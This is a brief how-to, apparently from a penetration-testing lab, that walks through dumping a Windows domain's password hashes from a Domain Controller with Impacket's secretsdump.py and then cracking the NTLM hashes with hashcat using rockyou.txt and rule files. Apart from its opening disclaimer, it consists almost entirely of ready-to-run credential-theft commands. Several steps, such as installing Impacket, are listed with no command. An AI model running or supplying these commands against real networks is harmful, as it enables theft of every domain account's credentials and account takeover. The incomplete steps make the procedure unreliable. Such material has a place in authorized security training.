Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
Using Impacket secretsdump.py
-
Update the package list:
-
Install Python3-pip:
sudo apt-get install python3-pip
-
Install Impacket:
-
Extract hashes from the Domain Controller:
secretsdump.py -outputfile inlanefreight_hashes -just-dc EXAMPLE/[USERNAME]:[PASSWORD]@[IP_ADDRESS]
-
Install Hashcat:
sudo apt-get install hashcat
-
Crack NTLM hashes with Hashcat:
hashcat -m 1000 -a 0 example_hashes.ntds /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force